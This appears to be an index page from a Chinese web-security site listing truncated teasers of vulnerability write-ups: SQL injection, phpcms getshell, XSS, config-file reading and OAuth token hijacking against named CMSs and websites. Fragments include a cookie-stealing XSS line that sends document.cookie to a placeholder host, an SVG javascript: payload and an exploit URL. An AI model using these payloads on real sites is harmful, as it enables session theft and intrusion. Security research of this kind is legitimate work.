Siteserver CMS SQL注入漏洞一枚(官网BBS中枪) - 网站安关注热度:12

Siteserver CMS 存在SQL注入漏洞，已测试官网论坛和多个互联网实例。漏洞链接：siteserver CMS console_tableMetadata aspx?ENName=cms_ContentTableType=BackgroundContent类型：盲注修复方案：过滤..[详情]

意大利网站后台POST注入记录 - 网站安全 - 自学关注热度:8

信息探测：目标站点：http: www sixxf it服务器IP：192 232 2xx 97（美国）环境平台：PHP服务器系统：Apache这次用网页探测这个站的信息不是很完整，直接奔主题吧，打开网站后台，在登录帐号..[详情]

phpcms前台和(后台低权限)getshell1 - 网站安全 - 自学关注热度:8

1、首先先说前台的吧，估计很多站都开始补了。是针对phpcms 2008的，二次攻击范畴，二次解析getshell。在upload_field php中br $upload_allowext = !empty($C[ 39;upload_allowext 39;]) ? $C[ 39;u..[详情]

xss如何加载远程js的一些tips - 网站安全 - 自学p关注热度:6

在早期 ， 对于xss我们是这样利用的scriptwindow open( http: xxx xxx cookie asp?msg= +document cookie) script将 cookie之类的数据传递到自己的服务端但是 如果要更为复杂的攻击的话，由于字符串长..[详情]

大汉版通JCMS数据库配置文件读取 - 网站安全 - 自关注热度:11

由于读取xml文件时没有对传进的参数进行过滤，flowcode参数可控，配置文件地址WEB-INF config dbconfig xml，由于控制了文件后缀，只能读取xml文件EXP:http: www iswin org jcms workflow design readxml jsp..[详情]

JSONP安全防范解决方案新思路 - 网站安全 - 自学关注热度:6

jsonp安全性防范，分为以下几点：1、防止callback参数意外截断js代码，特殊字符单引号双引号，换行符均存在风险2、防止callback参数恶意添加标签（如script），造成XSS漏洞3、防止跨域请求..[详情]

齐博CMS存储型XSS可getshell（组合利用） - 网站安全关注热度:11

齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还..[详情]

51CTO存在严重逻辑设计缺陷SHELL主站 - 网站安全关注热度:7

1 信息收集通过分析51cto com的网络结构，发现整体业务由多个分站构成，往往越多的系统会带来越多的安全问题，所以一个一个的摸索。~ linkphone cn 大面积使用PHPCMShttp: publish linkphone c..[详情]

phpcms v9 前台无限制GETSHELL（第一弹） - 网站安全关注热度:11

0x01:介绍PHPCMS V9（后面简称V9）采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP（面向对象）方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展，代码维护..[详情]

派代网主站设计缺陷可删除任意文章 - 网站安全关注热度:6

注册了2个号。在主站可以直接发文章。然后我抓了包http: www paidai com managetopic php?action=user_del_topicboardid=47topicid=202807posterid=669387这是直接get操作 删除文章的。然后另外一个号 发一..[详情]

绕过网易oauth认证的redirect_uri限制劫持帐号token关注热度:26

这里是通过网易帐号登录56网的授权页面:https: api t 163 com oauth2 authorize?client_id=II5coZy8DdAtKt7aredirect_uri=http%3A%2F%2Fapp 56 com%2Fcooperate%2Findex php%3Faction%3DWeibo%26tag%3Dwy%26do..[详情]

如何在网页上隐藏你的Email邮件地址 - 网站安全关注热度:8

你有一个网站，你想把email地址放在上面，让别人可以很方便地联系你，但是你又担心一旦公开邮箱地址，垃圾邮件可能会像洪水一样涌来。你 的担心是对的。现在网上抓取邮件地址的..[详情]

搜狐邮箱存储型XSS（需点击） - 网站安全 - 自学关注热度:11

对用户输入过滤不严，导致可植入恶意代码。payload:svga xlink:href=javascript：alert(document domain) target=_blanktextAAAAA text a svgimage和rect之类的，由于被过滤了width和heig..[详情]

攻击JavaWeb应用[9]-Server篇[2] - 网站安全 - 自学ph关注热度:29

注：在继后门篇后已经有很长时间没更新了，这次一打算写写Server[1]的续集。喜欢B S吗？那我们今天干脆就来写一个简单的Web服务器吧。0x01 WebServerWeb服务器可以解析(handles)HTTP协议。当..[详情]

科普跨站平台XSS SHELL使用方法 - 网站安全 - 自学关注热度:14

理解xss shell是什么之前，让我们一起回顾一下一些基本的xss（跨站脚本），xss是最常见的一个漏洞，存在于今天许多的web应用程序。xss是攻击者试图通过web应用程序执行恶意脚本的技术..[详情]